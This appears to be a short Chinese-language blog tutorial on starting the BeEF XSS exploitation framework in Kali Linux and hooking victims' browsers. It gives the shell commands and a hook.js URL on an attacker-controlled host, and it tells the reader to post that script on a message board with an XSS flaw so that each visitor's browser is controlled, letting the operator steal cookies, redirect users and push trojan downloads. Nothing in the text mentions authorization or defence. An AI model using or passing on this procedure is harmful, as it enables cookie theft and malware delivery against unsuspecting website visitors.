beef劫持客户端浏览器

kali linux里集合了beef劫持客户端浏览器的工具,beef是比较著名的一个xss利用框架,

它是基于web界面的交换方式友好,高度集成,开源的一个项目!和国外其他渗透测试项目一样,它也可以和其他很多工具结合使用,如MSF。




使用方法:

打开kali linux 打开终端搜索 find / -name beef

root@kali:~# find / -name beef
/usr/share/beef-xss/beef
/usr/share/python-faraday/plugins/repo/beef
find: ‘/run/user/130/gvfs’: 权限不够
root@kali:~# ^C
root@kali:~#

find搜索到beef的所在路径,我们需要切换到beef的所在目录将其启动即可

cd /usr/share/beef-xss 切换到beef所在目录

./beef 启动运行

启动之后beef会有详细的参数地址给出,如下图:



Hook URL: http://192.168.1.115:3000/hook.js hook是一个利用的js外链,每当XSS攻击执行该行js代码之后就会被触发
UI URL: http://192.168.1.115:3000/ui/panel 这是beef的控制端,每当hook被触发之后beef控制端就能控制客户端的一系列浏览器活动信息,比如Cookie和转跳,恶意下载木马链接等等操作。

我们把beef的利用代码 http://192.168.1.115:3000/hook.js 以js脚本的方式提交在有xss利用漏洞的留言板上,

每当客户端的浏览器访问即触发beef的利用代码,beef服务端上线达到控制客户端的浏览器权限



我们模拟一下客户端访问浏览器,这是会触发beef的恶意代码,我们可以看到如下的gif,beef的服务器可以,进行客户端浏览器的操作,转跳 ,下载,盗取cookie等…

结合beef 可以进行很多漏洞利用的操作,这就是beef的强大之处吧。